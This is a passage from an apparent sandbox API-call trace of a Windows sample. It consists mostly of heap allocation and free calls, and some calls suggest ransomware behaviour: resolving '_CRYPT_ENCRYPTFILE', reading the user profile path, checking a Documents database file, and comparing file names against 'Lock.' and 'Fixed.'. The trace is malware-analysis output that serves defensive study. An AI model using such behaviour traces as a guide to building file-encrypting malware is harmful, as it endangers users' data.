lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0262.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0262.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0262.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0262.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0262.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0262.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0262.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0262.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0262.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0262.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0262.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0262.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0262.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0262.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e558d8 [0262.683] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Database1.accdb", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Database1.accdb", lpFilePart=0x8cf650*="Database1.accdb") returned 0x29 [0262.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0262.683] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb")) returned 0xffffffff [0262.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0262.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0262.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0262.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0262.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0262.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0262.684] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0262.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0262.684] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0262.684] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0262.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0262.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0262.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0262.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0262.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0262.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0262.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0262.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0262.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0262.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0262.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0262.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0262.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0262.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0262.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0262.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0262.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0262.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0262.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0262.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0262.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0262.686] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0262.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0262.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0262.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0262.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0262.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0262.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0262.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0262.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0262.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0262.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0262.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0262.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0262.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0262.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0262.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0262.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0262.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0262.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0262.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0262.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0262.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0262.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0262.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0262.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0262.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0262.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0262.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0262.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0262.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0262.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0262.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0262.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0262.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0262.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0262.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0262.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0262.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0262.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0262.688] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0262.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0262.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0262.688] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0262.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0262.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0262.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0262.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ec8 [0262.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0262.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0262.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0262.689] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0262.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0262.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0262.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0262.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0262.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0262.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0262.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0262.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0262.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0262.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0262.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0262.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0262.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0262.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0262.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0262.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0262.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0262.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0262.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e38 [0262.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0262.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0262.690] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0262.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0262.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0262.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0262.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0262.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0262.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0262.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0262.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0262.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0262.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0262.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0262.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0262.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0262.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0262.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0262.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0262.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ed8 [0262.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0262.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0262.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0262.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0262.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d88 [0262.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0262.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0262.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0262.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0262.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0262.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0262.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0262.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0262.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0262.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0262.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0262.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0262.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0262.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0262.692] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0262.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0262.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0262.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0262.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0262.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0262.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0262.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0262.694] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0262.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0262.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0262.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0262.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0262.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0262.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0262.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0262.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0262.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0262.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0262.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0262.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0262.695] 